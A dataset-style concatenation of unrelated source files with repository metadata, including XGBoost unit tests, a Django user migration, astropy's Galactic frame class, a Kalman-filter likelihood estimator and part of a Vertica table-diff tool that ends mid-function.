self.assertRaises(xgb.core.XGBoostError, xgb.Booster,
model_file='incorrect_path')
self.assertRaises(xgb.core.XGBoostError, xgb.Booster,
model_file=u'不正なパス')
def test_dmatrix_numpy_init_omp(self):
rows = [1000, 11326, 15000]
cols = 50
for row in rows:
X = np.random.randn(row, cols)
y = np.random.randn(row).astype('f')
dm = xgb.DMatrix(X, y, nthread=0)
np.testing.assert_array_equal(dm.get_label(), y)
assert dm.num_row() == row
assert dm.num_col() == cols
dm = xgb.DMatrix(X, y, nthread=10)
np.testing.assert_array_equal(dm.get_label(), y)
assert dm.num_row() == row
assert dm.num_col() == cols
def test_cv(self):
dm = xgb.DMatrix(dpath + 'agaricus.txt.train')
params = {'max_depth': 2, 'eta': 1, 'verbosity': 0,
'objective': 'binary:logistic'}
# return np.ndarray
cv = xgb.cv(params, dm, num_boost_round=10, nfold=10, as_pandas=False)
assert isinstance(cv, dict)
assert len(cv) == (4)
def test_cv_no_shuffle(self):
dm = xgb.DMatrix(dpath + 'agaricus.txt.train')
params = {'max_depth': 2, 'eta': 1, 'verbosity': 0,
'objective': 'binary:logistic'}
# return np.ndarray
cv = xgb.cv(params, dm, num_boost_round=10, shuffle=False, nfold=10,
as_pandas=False)
assert isinstance(cv, dict)
assert len(cv) == (4)
def test_cv_explicit_fold_indices(self):
dm = xgb.DMatrix(dpath + 'agaricus.txt.train')
params = {'max_depth': 2, 'eta': 1, 'verbosity': 0, 'objective':
'binary:logistic'}
folds = [
# Train Test
([1, 3], [5, 8]),
([7, 9], [23, 43]),
]
# return np.ndarray
cv = xgb.cv(params, dm, num_boost_round=10, folds=folds,
as_pandas=False)
assert isinstance(cv, dict)
assert len(cv) == (4)
def test_cv_explicit_fold_indices_labels(self):
params = {'max_depth': 2, 'eta': 1, 'verbosity': 0, 'objective':
'reg:squarederror'}
N = 100
F = 3
dm = xgb.DMatrix(data=np.random.randn(N, F), label=np.arange(N))
folds = [
# Train Test
([1, 3], [5, 8]),
([7, 9], [23, 43, 11]),
]
# Use callback to log the test labels in each fold
def cb(cbackenv):
print([fold.dtest.get_label() for fold in cbackenv.cvfolds])
# Run cross validation and capture standard out to test callback result
with captured_output() as (out, err):
xgb.cv(
params, dm, num_boost_round=1, folds=folds, callbacks=[cb],
as_pandas=False
)
output = out.getvalue().strip()
solution = ('[array([5., 8.], dtype=float32), array([23., 43., 11.],' +
' dtype=float32)]')
assert output == solution
class TestBasicPathLike(unittest.TestCase):
"""Unit tests using the os_fspath and pathlib.Path for file interaction."""
def test_DMatrix_init_from_path(self):
"""Initialization from the data path."""
dpath = Path('demo/data')
dtrain = xgb.DMatrix(dpath / 'agaricus.txt.train')
assert dtrain.num_row() == 6513
assert dtrain.num_col() == 127
def test_DMatrix_save_to_path(self):
"""Saving to a binary file using pathlib from a DMatrix."""
data = np.random.randn(100, 2)
target = np.array([0, 1] * 50)
features = ['Feature1', 'Feature2']
dm = xgb.DMatrix(data, label=target, feature_names=features)
# save, assert exists, remove file
binary_path = Path("dtrain.bin")
dm.save_binary(binary_path)
assert binary_path.exists()
Path.unlink(binary_path)
def test_Booster_init_invalid_path(self):
"""An invalid model_file path should raise XGBoostError."""
self.assertRaises(xgb.core.XGBoostError, xgb.Booster,
model_file=Path("invalidpath"))
def test_Booster_save_and_load(self):
"""Saving and loading model files from paths."""
save_path = Path("saveload.model")
data = np.random.randn(100, 2)
target = np.array([0, 1] * 50)
features = ['Feature1', 'Feature2']
dm = xgb.DMatrix(data, label=target, feature_names=features)
params = {'objective': 'binary:logistic',
'eval_metric': 'logloss',
'eta': 0.3,
'max_depth': 1}
bst = xgb.train(params, dm, num_boost_round=1)
# save, assert exists
bst.save_model(save_path)
assert save_path.exists()
def dump_assertions(dump):
"""Assertions for the expected dump from Booster"""
assert len(dump) == 1, 'Exepcted only 1 tree to be dumped.'
assert len(dump[0].splitlines()) == 3, 'Expected 1 root and 2 leaves - 3 lines.'
# load the model again using Path
bst2 = xgb.Booster(model_file=save_path)
dump2 = bst2.get_dump()
dump_assertions(dump2)
# load again using load_model
bst3 = xgb.Booster()
bst3.load_model(save_path)
dump3= bst3.get_dump()
dump_assertions(dump3)
# remove file
Path.unlink(save_path)
def test_os_fspath(self):
"""Core properties of the os_fspath function."""
# strings are returned unmodified
assert '' == xgb.compat.os_fspath('')
assert '/this/path' == xgb.compat.os_fspath('/this/path')
# bytes are returned unmodified
assert b'/this/path' == xgb.compat.os_fspath(b'/this/path')
# path objects are returned as string representation
path_test = Path('this') / 'path'
assert str(path_test) == xgb.compat.os_fspath(path_test)
# invalid values raise Type error
self.assertRaises(TypeError, xgb.compat.os_fspath, 123)
| 36.497024 | 101 | 0.577346 |
acfb6e045addb33ebadcc4064c8f36a0f4f33f3b | 4,843 | py | Python | users/migrations/0001_initial.py | almazkun/TWS | c4c52e9f96a0638e395e39a17186e43cfefd5093 | [
"MIT"
] | 1 | 2020-06-12T05:50:59.000Z | 2020-06-12T05:50:59.000Z | users/migrations/0001_initial.py | almazkun/TWS | c4c52e9f96a0638e395e39a17186e43cfefd5093 | [
"MIT"
] | 6 | 2020-06-09T09:54:16.000Z | 2021-09-22T19:16:11.000Z | users/migrations/0001_initial.py | almazkun/TWS | c4c52e9f96a0638e395e39a17186e43cfefd5093 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.4 on 2020-06-09 02:25
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [("auth", "0011_update_proxy_permissions")]
operations = [
migrations.CreateModel(
name="CustomUser",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("password", models.CharField(max_length=128, verbose_name="password")),
(
"last_login",
models.DateTimeField(
blank=True, null=True, verbose_name="last login"
),
),
(
"is_superuser",
models.BooleanField(
default=False,
help_text="Designates that this user has all permissions without explicitly assigning them.",
verbose_name="superuser status",
),
),
(
"username",
models.CharField(
error_messages={
"unique": "A user with that username already exists."
},
help_text="Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.",
max_length=150,
unique=True,
validators=[
django.contrib.auth.validators.UnicodeUsernameValidator()
],
verbose_name="username",
),
),
(
"first_name",
models.CharField(
blank=True, max_length=30, verbose_name="first name"
),
),
(
"last_name",
models.CharField(
blank=True, max_length=150, verbose_name="last name"
),
),
(
"email",
models.EmailField(
blank=True, max_length=254, verbose_name="email address"
),
),
(
"is_staff",
models.BooleanField(
default=False,
help_text="Designates whether the user can log into this admin site.",
verbose_name="staff status",
),
),
(
"is_active",
models.BooleanField(
default=True,
help_text="Designates whether this user should be treated as active. Unselect this instead of deleting accounts.",
verbose_name="active",
),
),
(
"date_joined",
models.DateTimeField(
default=django.utils.timezone.now, verbose_name="date joined"
),
),
("name", models.CharField(blank=True, max_length=255)),
(
"groups",
models.ManyToManyField(
blank=True,
help_text="The groups this user belongs to. A user will get all permissions granted to each of their groups.",
related_name="user_set",
related_query_name="user",
to="auth.Group",
verbose_name="groups",
),
),
(
"user_permissions",
models.ManyToManyField(
blank=True,
help_text="Specific permissions for this user.",
related_name="user_set",
related_query_name="user",
to="auth.Permission",
verbose_name="user permissions",
),
),
],
options={
"verbose_name": "user",
"verbose_name_plural": "users",
"abstract": False,
},
managers=[("objects", django.contrib.auth.models.UserManager())],
)
]
| 37.253846 | 138 | 0.400991 |
acfb6f35e3a1ba65761121fd690e7e2767f862d9 | 101 | py | Python | Aula 07/Ex4.py | diegorafaelvieira/Programacao-1 | 657a974f1215cec4aed68603e738d9a135131545 | [
"MIT"
] | null | null | null | Aula 07/Ex4.py | diegorafaelvieira/Programacao-1 | 657a974f1215cec4aed68603e738d9a135131545 | [
"MIT"
] | null | null | null | Aula 07/Ex4.py | diegorafaelvieira/Programacao-1 | 657a974f1215cec4aed68603e738d9a135131545 | [
"MIT"
] | null | null | null | produto = 1
# Multiply produto by every odd number from 1 to 15.
for numero in range(1, 16, 2):
    produto *= numero
print(produto)
| 16.833333 | 27 | 0.534653 |
acfb6f4c22a2b205e26993f1482180711acd9b81 | 4,059 | py | Python | astropy/coordinates/builtin_frames/galactic.py | Olek-Donaldson/astropy | ed9ec69007bd540bcf476def57c5231e5e7c1240 | [
"BSD-3-Clause"
] | 4 | 2021-03-25T15:49:56.000Z | 2021-12-15T09:10:04.000Z | astropy/coordinates/builtin_frames/galactic.py | Olek-Donaldson/astropy | ed9ec69007bd540bcf476def57c5231e5e7c1240 | [
"BSD-3-Clause"
] | 20 | 2021-05-03T18:02:23.000Z | 2022-03-12T12:01:04.000Z | astropy/coordinates/builtin_frames/galactic.py | Olek-Donaldson/astropy | ed9ec69007bd540bcf476def57c5231e5e7c1240 | [
"BSD-3-Clause"
] | 3 | 2021-03-28T16:13:00.000Z | 2021-07-16T10:27:25.000Z | # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from astropy import units as u
from astropy.utils.decorators import format_doc
from astropy.coordinates.angles import Angle
from astropy.coordinates import representation as r
from astropy.coordinates.baseframe import BaseCoordinateFrame, RepresentationMapping, base_doc
# these are needed for defining the NGP
from .fk5 import FK5
from .fk4 import FK4NoETerms
__all__ = ['Galactic']
doc_components = """
l : `~astropy.coordinates.Angle`, optional, must be keyword
The Galactic longitude for this object (``b`` must also be given and
``representation`` must be None).
b : `~astropy.coordinates.Angle`, optional, must be keyword
The Galactic latitude for this object (``l`` must also be given and
``representation`` must be None).
distance : `~astropy.units.Quantity`, optional, must be keyword
The Distance for this object along the line-of-sight.
pm_l_cosb : :class:`~astropy.units.Quantity`, optional, must be keyword
The proper motion in Galactic longitude (including the ``cos(b)`` term)
for this object (``pm_b`` must also be given).
pm_b : :class:`~astropy.units.Quantity`, optional, must be keyword
The proper motion in Galactic latitude for this object (``pm_l_cosb``
must also be given).
radial_velocity : :class:`~astropy.units.Quantity`, optional, must be keyword
The radial velocity of this object.
"""
doc_footer = """
Notes
-----
.. [1] Blaauw, A.; Gum, C. S.; Pawsey, J. L.; Westerhout, G. (1960), "The
new I.A.U. system of galactic coordinates (1958 revision),"
`MNRAS, Vol 121, pp.123 <https://ui.adsabs.harvard.edu/abs/1960MNRAS.121..123B>`_.
"""
@format_doc(base_doc, components=doc_components, footer=doc_footer)
class Galactic(BaseCoordinateFrame):
"""
A coordinate or frame in the Galactic coordinate system.
This frame is used in a variety of Galactic contexts because it has as its
x-y plane the plane of the Milky Way. The positive x direction (i.e., the
l=0, b=0 direction) points to the center of the Milky Way and the z-axis
points toward the North Galactic Pole (following the IAU's 1958 definition
[1]_). However, unlike the `~astropy.coordinates.Galactocentric` frame, the
*origin* of this frame in 3D space is the solar system barycenter, not
the center of the Milky Way.
"""
frame_specific_representation_info = {
r.SphericalRepresentation: [
RepresentationMapping('lon', 'l'),
RepresentationMapping('lat', 'b')
],
r.CartesianRepresentation: [
RepresentationMapping('x', 'u'),
RepresentationMapping('y', 'v'),
RepresentationMapping('z', 'w')
],
r.CartesianDifferential: [
RepresentationMapping('d_x', 'U', u.km/u.s),
RepresentationMapping('d_y', 'V', u.km/u.s),
RepresentationMapping('d_z', 'W', u.km/u.s)
]
}
default_representation = r.SphericalRepresentation
default_differential = r.SphericalCosLatDifferential
# North galactic pole and zeropoint of l in FK4/FK5 coordinates. Needed for
# transformations to/from FK4/5
# These are from the IAU's definition of galactic coordinates
_ngp_B1950 = FK4NoETerms(ra=192.25*u.degree, dec=27.4*u.degree)
_lon0_B1950 = Angle(123, u.degree)
# These are *not* from Reid & Brunthaler 2004 - instead, they were
# derived by doing:
#
# >>> FK4NoETerms(ra=192.25*u.degree, dec=27.4*u.degree).transform_to(FK5())
#
# This gives better consistency with other codes than using the values
# from Reid & Brunthaler 2004 and the best self-consistency between FK5
# -> Galactic and FK5 -> FK4 -> Galactic. The lon0 angle was found by
# optimizing the self-consistency.
_ngp_J2000 = FK5(ra=192.8594812065348*u.degree, dec=27.12825118085622*u.degree)
_lon0_J2000 = Angle(122.9319185680026, u.degree)
| 41.418367 | 94 | 0.68071 |
acfb706e6f53ca1796ce2c207354028a9d427f9c | 2,839 | py | Python | max_likelihood.py | SnetkovR/mmpe | 3aabd85dc487b4d9a3ba69d1cfbdfe107e318a91 | [
"Apache-2.0"
] | null | null | null | max_likelihood.py | SnetkovR/mmpe | 3aabd85dc487b4d9a3ba69d1cfbdfe107e318a91 | [
"Apache-2.0"
] | null | null | null | max_likelihood.py | SnetkovR/mmpe | 3aabd85dc487b4d9a3ba69d1cfbdfe107e318a91 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import copy
from scipy.integrate import odeint
from collections import namedtuple
class MaxLikelihood:
    """Likelihood-style criterion for a linear continuous-time state-space
    model with discrete measurements, evaluated via a Kalman-filter style
    recursion in ``estimate`` (the accumulated terms match a Gaussian
    innovations log-likelihood -- see the constant and innovation terms).
    NOTE(review): ``self._y`` (the measurement sequence) is never set in
    ``__init__``; the ``y`` setter must be called before ``estimate`` or the
    first access to ``self._y`` raises AttributeError -- confirm intended use.
    """
    def __init__(self, Q, R, H,
                 x_0, P, t,
                 F, Gamma, nu,
                 u, N, phi, update_dict):
        # Q / R: process- and measurement-noise covariance matrices.
        self._Q = Q
        self._R = R
        # x_0 / P: initial state estimate and its covariance (kept diagonal
        # by calc_P / eq_for_p).
        self.x_0 = x_0
        self._P = P
        # t: time grid; estimate() reads t[i] and t[i + 1] for N steps,
        # so it presumably has length N + 1 -- confirm against callers.
        self.t = t
        self._F = F
        self._H = H
        self.N = N
        self.nu = nu
        # Gamma: process-noise input matrix; phi: control-to-state map (dxdt).
        self.Gamma = Gamma
        self.u = u
        self.phi = phi
        # update_dict: attribute name -> callable(params), applied by update().
        self.update_dict = update_dict
    @property
    def x0(self):
        """Initial state estimate."""
        return self.x_0
    @property
    def p0(self):
        """Initial state covariance."""
        return self._P
    @property
    def R(self):
        """Measurement-noise covariance."""
        return self._R
    @property
    def Q(self):
        """Process-noise covariance."""
        return self._Q
    @property
    def H(self):
        """Observation (measurement) matrix."""
        return self._H
    @property
    def y(self):
        """Measurement sequence (must be assigned via the setter first)."""
        return self._y
    @y.setter
    def y(self, _y):
        # NOTE(review): a falsy value (e.g. empty list) is silently ignored.
        if _y:
            self._y = copy.copy(_y)
    @property
    def F(self):
        """State transition (system) matrix."""
        return self._F
    @F.setter
    def F(self, _F):
        # NOTE(review): a falsy value is silently ignored, as in the y setter.
        if _F:
            self._F = copy.copy(_F)
    def update(self, params):
        """Refresh model attributes from *params* via the update_dict callables."""
        for var in self.update_dict:
            # Only overwrite attributes that already exist and are not None.
            if self.__dict__.get(var) is not None:
                self.__dict__[var] = self.update_dict[var](params)
    def dxdt(self, x, t, u):
        """State derivative for odeint: dx/dt = F x + [u] @ phi (t unused)."""
        return self._F @ x + np.array([u]) @ self.phi
    def calc_P(self, P, t):
        """Diagonal of the covariance ODE dP/dt = F P + P F' + Gamma Q Gamma'."""
        p = np.diagflat(P)
        return np.diag(self._F @ p + p @ self._F.T + self.Gamma @ self.Q @ self.Gamma.T)
    def eq_for_p(self, time_step, x0):
        """Propagate the (diagonal) covariance x0 across one time step."""
        t = np.linspace(time_step.start, time_step.end, 10)
        x = odeint(self.calc_P, np.diag(x0), t)
        # Keep only the final time point, reassembled as a diagonal matrix.
        return np.diagflat([x[:, i][-1] for i in range(len(x0))])
    def eq_for_x(self, time_step, x, u, estimated_values):
        """Propagate the state x across one time step under control input u.
        NOTE(review): *estimated_values* is accepted but never used here.
        """
        t_tk = np.linspace(time_step.start, time_step.end, 31)
        x0 = x
        x = odeint(self.dxdt, x0, t_tk, args=(u,))
        # Final integration point for each state component.
        return [x[:, i][-1] for i in range(len(x0))]
    def estimate(self, params):
        """Evaluate the criterion for *params* over the N measurement steps."""
        # NOTE(review): dxdt is a bound method, never None -- this guard
        # cannot fire as written.
        if self.dxdt is None:
            raise Exception("Before start estimate, please init methods.")
        self.update(params)
        x_tk = self.x_0
        p_tk = self._P
        TimeStep = namedtuple('TimeStep', ['start', 'end'])
        # Constant term of the Gaussian log-likelihood.
        result = self.N / 2 * np.log(2 * np.pi)
        for i in range(self.N):
            step = TimeStep(self.t[i], self.t[i + 1])
            # Time update: propagate state and covariance to t[i + 1].
            x = self.eq_for_x(step, x_tk, self.u[i], params)
            p = self.eq_for_p(step, p_tk)
            # Innovation (measurement residual) and its covariance.
            e_tk = self._y[i] - self.H @ x
            B = self.H @ p @ self.H + self.R
            # Gain and measurement update.
            K = p @ self.H / B
            x_tk = x + K @ e_tk
            p_tk = (np.eye(self._F.shape[0]) - K @ self.H) * p
            result += e_tk @ (1 / B) @ e_tk.T + 0.5 * self.nu * np.log(np.linalg.det(B))
        result /= 2
        return result
| 25.576577 | 88 | 0.512504 |
acfb70de1b2b25998c73f9f7ede1661ceea63f2f | 27,009 | py | Python | src/dbdiff/main.py | andyreagan/dbdiff | 6fccc6cd7c88e1e91def7bfc89057b0c0fd73883 | [
"MIT"
] | null | null | null | src/dbdiff/main.py | andyreagan/dbdiff | 6fccc6cd7c88e1e91def7bfc89057b0c0fd73883 | [
"MIT"
] | null | null | null | src/dbdiff/main.py | andyreagan/dbdiff | 6fccc6cd7c88e1e91def7bfc89057b0c0fd73883 | [
"MIT"
] | null | null | null | import logging
import logging.config
from pathlib import Path
from typing import Any, Dict, Tuple
import pandas as pd
from jinja2 import Environment, PackageLoader
from vertica_python.vertica.cursor import Cursor
from dbdiff.vertica import get_column_info_lookup, implicit_dtype_comparison
JINJA_ENV = Environment(loader=PackageLoader('dbdiff', 'templates'))
LOGGER = logging.getLogger(__name__)
def is_numeric_like(dtype: str) -> bool:
    """Return True if *dtype* names a numeric SQL type.

    Matches any type whose (case-insensitive) name contains 'int', 'float'
    or 'numeric', e.g. INTEGER, BIGINT, FLOAT8, NUMERIC(10, 2).
    """
    dtype_l = dtype.lower()
    # Generator instead of a throwaway set literal; any() short-circuits.
    return any(token in dtype_l for token in ('int', 'float', 'numeric'))
def is_date_like(dtype: str):
    """Return True if *dtype* names a date-like SQL type (its
    case-insensitive name contains the substring 'date')."""
    return 'date' in dtype.lower()
def check_primary_key(cur: Cursor,
                      schema: str, table: str,
                      join_cols: list) -> int:
    '''Return the number of surplus rows: total rows minus rows distinct on
    ``join_cols``. A result of 0 means the columns form a primary key.'''
    total_q = JINJA_ENV.get_template('table_rows.sql').render(
        schema_name=schema, table_name=table)
    cur.execute(total_q)
    total_rows = cur.fetchall()[0]['COUNT']
    distinct_q = JINJA_ENV.get_template('table_rows_uniq.sql').render(
        schema_name=schema, table_name=table, join_cols=', '.join(join_cols))
    cur.execute(distinct_q)
    distinct_rows = cur.fetchall()[0]['COUNT']
    return total_rows - distinct_rows
def get_all_col_info(cur: Cursor, schema, x_table, y_schema, y_table, exclude_columns_set, save_column_summary, save_column_summary_format) -> pd.DataFrame:
    """Build a per-column comparison of the two tables' dtypes.
    Returns a DataFrame indexed by column name with columns ``x_dtype`` /
    ``y_dtype`` (None when the column is missing on that side),
    ``comparable`` (dtypes implicitly convertible in at least one direction)
    and ``exclude`` (column listed in *exclude_columns_set*).
    When *save_column_summary* is true the frame is written to
    ``<x_table>_col_info.csv`` or ``.pkl`` per *save_column_summary_format*;
    otherwise the summaries are logged instead.
    """
    LOGGER.info('Getting column info for both tables.')
    x_table_info_lookup = get_column_info_lookup(cur, schema, x_table)
    y_table_info_lookup = get_column_info_lookup(cur, y_schema, y_table)
    def comparable_(x, y) -> bool:
        # A missing dtype on either side is never comparable. This doesn't
        # capture two-hop conversions (e.g. both sides castable to float).
        if (x is None) or (y is None):
            return False
        return implicit_dtype_comparison(x, y) or implicit_dtype_comparison(y, x)
    # dict.fromkeys dedupes columns present in both tables (the previous list
    # concatenation processed shared columns twice) while preserving order.
    all_keys = dict.fromkeys(list(x_table_info_lookup) + list(y_table_info_lookup))
    all_col_info = {col: {'x_dtype': x_table_info_lookup.get(col),
                          'y_dtype': y_table_info_lookup.get(col),
                          'comparable': comparable_(x_table_info_lookup.get(col),
                                                    y_table_info_lookup.get(col)),
                          'exclude': (col in exclude_columns_set)
                          } for col in all_keys}
    LOGGER.debug(all_col_info)
    all_col_info_df = pd.DataFrame(all_col_info).transpose()
    if save_column_summary:
        fmt = save_column_summary_format.lower()
        if fmt == 'csv':
            all_col_info_df.to_csv(Path(x_table + '_col_info.csv'))
        elif fmt == 'pickle':
            all_col_info_df.to_pickle(Path(x_table + '_col_info.pkl'))
        else:
            # Previously an unrecognized format silently saved nothing.
            LOGGER.warning('Unknown save_column_summary_format %r; nothing saved.',
                           save_column_summary_format)
    else:
        LOGGER.info("All column info:\n" + all_col_info_df.to_string())
        LOGGER.info("Missing columns in x:\n" + all_col_info_df.loc[all_col_info_df.x_dtype.isnull(), :].to_string())
        LOGGER.info("Missing columns in y:\n" + all_col_info_df.loc[all_col_info_df.y_dtype.isnull(), :].to_string())
    LOGGER.debug(all_col_info_df.comparable)
    LOGGER.debug(~all_col_info_df.comparable)
    # .astype('bool') is needed: transpose() yields object-dtype columns and
    # .loc requires a boolean mask.
    LOGGER.info("These columns have incompatible dtypes, specifically neither of them can be implicitly converted to the other:\n" + all_col_info_df.loc[(~all_col_info_df.comparable).astype('bool'), :].to_string())
    return all_col_info_df
def select_distinct_rows(cur: Cursor,
                         schema: str, table: str,
                         join_cols: list,
                         use_temp_tables: bool = False) -> Tuple[str, str]:
    '''Select only the rows that are distinct on join_cols.
    Builds two derived tables -- ``<table>_dedup`` (rows kept) and
    ``<table>_dup`` (the duplicated rows) -- and returns the
    ``(schema, table)`` pair of the deduplicated table.
    *Instead of deleting the rows, we'll select those without duplicates into a
    new table, and return the name of that new table.
    Delete is inefficient, see: https://www.vertica.com/docs/9.2.x/HTML/Content/Authoring/AnalyzingData/Optimizations/PerformanceConsiderationsForDELETEAndUPDATEQueries.htm
    And: https://www.vertica.com/blog/another-way-to-de-duplicate-table-rows-quick-tip/
    '''
    def _build(suffix: str, template_name: str, target_kwarg: str) -> None:
        # DROP the derived table, CREATE it from its template, then COMMIT.
        # This sequence was previously duplicated inline for both tables.
        target = table + suffix
        drop_q = JINJA_ENV.get_template('table_drop.sql').render(
            schema_name=schema, table_name=target)
        LOGGER.info(drop_q)
        cur.execute(drop_q)
        q = JINJA_ENV.get_template(template_name).render(
            schema_name=schema, table_name=table,
            group_cols=', '.join(join_cols),
            join_cols=' AND '.join('x.{0} <=> y.{0}'.format(col) for col in join_cols),
            use_temp_table=use_temp_tables,
            **{target_kwarg: target}
        )
        if use_temp_tables:
            # Wrap the statement so the result lands in a session temp table.
            q = JINJA_ENV.get_template('create_temp_table.sql').render(table_name=target, query=q)
        LOGGER.info(q)
        cur.execute(q)
        LOGGER.info('COMMIT;')
        cur.execute('COMMIT;')
    _build('_dedup', 'create_dedup.sql', 'table_name_dedup')
    _build('_dup', 'create_dup.sql', 'table_name_dup')
    return (schema, 'v_temp_schema')[use_temp_tables], '{table}_dedup'.format(table=table)
def create_joined_table(cur: Cursor, create_insert=False, **kwargs):
    """
    Joins two tables x and y into a single joined table.

    Any pre-existing joined table is dropped first; the join is then built
    either via separate CREATE TABLE + INSERT INTO statements
    (create_insert=True) or via a single SELECT INTO (create_insert=False),
    followed by a COMMIT.

    :param cur: vertica python Cursor
    :param create_insert: if True, use CREATE TABLE + INSERT INTO instead of
        SELECT INTO.
    :param kwargs: template parameters; 'joined_schema' and 'joined_table'
        are required here, the rest feed the join templates.
    :return: int - row count of the newly built joined table.
    """
    drop_q = JINJA_ENV.get_template('table_drop.sql').render(
        schema_name=kwargs['joined_schema'],
        table_name=kwargs['joined_table'])
    LOGGER.info(drop_q)
    cur.execute(drop_q)
    if create_insert:
        # these separately do CREATE TABLE and then
        # INSERT INTO
        create_q = JINJA_ENV.get_template('create_joined_table.sql').render(kwargs)
        LOGGER.info(create_q)
        cur.execute(create_q)
        insert_q = JINJA_ENV.get_template('insert_joined_table.sql').render(kwargs)
        LOGGER.info(insert_q)
        cur.execute(insert_q)
    else:
        # this does a SELECT INTO
        join_q = JINJA_ENV.get_template('create_joined_table_from_selectinto.sql').render(kwargs)
        LOGGER.info(join_q)
        cur.execute(join_q)
    LOGGER.info('COMMIT;')
    cur.execute('COMMIT;')
    # Report how many rows ended up in the joined table.
    table_rows_q = JINJA_ENV.get_template('table_rows.sql').render(
        schema_name=kwargs['joined_schema'],
        table_name=kwargs['joined_table'])
    LOGGER.info(table_rows_q)
    cur.execute(table_rows_q)
    r = cur.fetchall()
    joined_row_count = r[0]['COUNT']
    return joined_row_count
def get_unmatched_rows_straight(
        cur: Cursor,
        x_schema: str,
        y_schema: str,
        x_table: str,
        y_table: str,
        join_cols: list,
        max_rows_column: int
) -> Dict[str, Dict[str, Any]]:
    '''
    Get rows that don't match on a join using all of the keys ("straight").

    For each side ('x' and 'y') the result carries the unmatched-row count,
    the sample query used, and a DataFrame sample of those rows.
    '''
    count_template = JINJA_ENV.get_template('all_keys_count.sql')
    sample_template = JINJA_ENV.get_template('all_keys_sample.sql')
    out = {}
    for side in ('x', 'y'):
        params = {
            'x_schema': x_schema,
            'y_schema': y_schema,
            'x_table': x_table,
            'y_table': y_table,
            'join_cols': join_cols,
            'x': side == 'x',
            'max_rows_column': max_rows_column
        }
        cur.execute(count_template.render(params))
        unmatched_count = cur.fetchall()[0]['COUNT']
        sample_query = sample_template.render(params)
        cur.execute(sample_query)
        out[side] = {
            'count': unmatched_count,
            'query': sample_query,
            'sample': pd.DataFrame(cur.fetchall()),
        }
    return out
def get_unmatched_rows(
        cur: Cursor,
        x_schema: str,
        y_schema: str,
        x_table: str,
        y_table: str,
        join_cols: list,
        max_rows_column: int
) -> Dict[Any, Dict[str, Dict[str, Any]]]:
    '''
    Pull out rows that are unmatched between the two tables on the join columns.

    If looking at this hierarchically, we consider the join by
    key a, then key a+b (where a matched), then key a+b+c (where a+b matched), etc
    to see at what level we're missing things.

    :param cur: vertica python Cursor.
    :param x_schema: schema of the x-side table.
    :param y_schema: schema of the y-side table.
    :param x_table: name of the x-side table.
    :param y_table: name of the y-side table.
    :param join_cols: ordered join-key columns; the order defines the hierarchy.
    :param max_rows_column: passed to the sample templates to cap sample size.
    :return: {join_col: {'x'|'y': {'count', 'query', 'sample', plus
        'query_grouped'/'sample_grouped' for all but the first column}}}.
    '''
    # One result slot per join column, each holding both sides.
    results = {col: {'x': {'count': 0, 'query': 'select ...', 'sample': pd.DataFrame()},
                     'y': {'count': 0, 'query': 'select ...', 'sample': pd.DataFrame()}} for col in join_cols}
    first_key_count = JINJA_ENV.get_template('first_key_count.sql')
    first_key_t = JINJA_ENV.get_template('first_key_sample.sql')
    sub_keys_count = JINJA_ENV.get_template('sub_keys_count.sql')
    sub_keys_t = JINJA_ENV.get_template('sub_keys_sample.sql')
    sub_keys_g = JINJA_ENV.get_template('sub_keys_grouped.sql')
    LOGGER.info('Getting rows that did not match on only the first join column: ' + join_cols[0] + '.')
    # The first join column has its own pair of templates (single-key join).
    for side in {'x', 'y'}:
        d = {
            'x_schema': x_schema,
            'y_schema': y_schema,
            'x_table': x_table,
            'y_table': y_table,
            'join_col': join_cols[0],
            'x': (side == 'x'),
            'max_rows_column': max_rows_column
        }
        q = first_key_count.render(d)
        cur.execute(q)
        r = cur.fetchall()
        results[join_cols[0]][side]['count'] = r[0]['COUNT']
        results[join_cols[0]][side]['query'] = first_key_t.render(d)
        cur.execute(results[join_cols[0]][side]['query'])
        results[join_cols[0]][side]['sample'] = pd.DataFrame(cur.fetchall())
    # Remaining columns: join on the key prefix join_cols[:i+1] using the
    # sub_keys_* templates, which also produce a grouped variant.
    for i in range(1, len(join_cols)):
        LOGGER.info('Getting rows that did not match on the ' + str(i + 1) + '-nd/rd/th join column: ' + join_cols[i] + '.')
        LOGGER.info('This is equivalent to joining the tables on unique rows of ' + ','.join(join_cols[:(i + 1)]) + ' where all but the last already exist.')
        for side in {'x', 'y'}:
            d = {
                'x_schema': x_schema,
                'y_schema': y_schema,
                'x_table': x_table,
                'y_table': y_table,
                'join_cols': join_cols[:(i + 1)],
                'x': (side == 'x'),
                'max_rows_column': max_rows_column
            }
            q = sub_keys_count.render(d)
            cur.execute(q)
            r = cur.fetchall()
            results[join_cols[i]][side]['count'] = r[0]['COUNT']
            results[join_cols[i]][side]['query'] = sub_keys_t.render(d)
            cur.execute(results[join_cols[i]][side]['query'])
            results[join_cols[i]][side]['sample'] = pd.DataFrame(cur.fetchall())
            results[join_cols[i]][side]['query_grouped'] = sub_keys_g.render(d)
            cur.execute(results[join_cols[i]][side]['query_grouped'])
            results[join_cols[i]][side]['sample_grouped'] = pd.DataFrame(cur.fetchall())
    return results
def create_diff_table(cur: Cursor,
                      schema: str, table: str,
                      join_cols: list, all_col_info_df: pd.DataFrame) -> str:
    """Drop and re-create the diff table; return the CREATE statement used.

    The diff table carries the join-key columns (typed with the x-side
    dtype from ``all_col_info_df``) plus a ``column_name`` VARCHAR column.
    """
    # Column definitions such as "id INTEGER" for every join column.
    key_rows = all_col_info_df.loc[all_col_info_df.index.isin(join_cols)]
    column_defs = ', '.join(key_rows.apply(lambda r: ' '.join([r.name, r.x_dtype]), axis=1).values)
    # so simple that putting into a template would make this harder to follow...
    create_q = 'CREATE TABLE {schema}.{table} ( {columns}, column_name VARCHAR(255) );'.format(
        schema=schema,
        table=table,
        columns=column_defs
    )
    cur.execute(JINJA_ENV.get_template('table_drop.sql').render(schema_name=schema, table_name=table))
    cur.execute(create_q)
    return create_q
def insert_diff_table(cur: Cursor, **kwargs) -> None:
    """Populate the diff table via the insert_diff.sql template, then commit."""
    insert_q = JINJA_ENV.get_template('insert_diff.sql').render(kwargs)
    cur.execute(insert_q)
    cur.execute('COMMIT;')
def get_diff_rows(cur: Cursor,
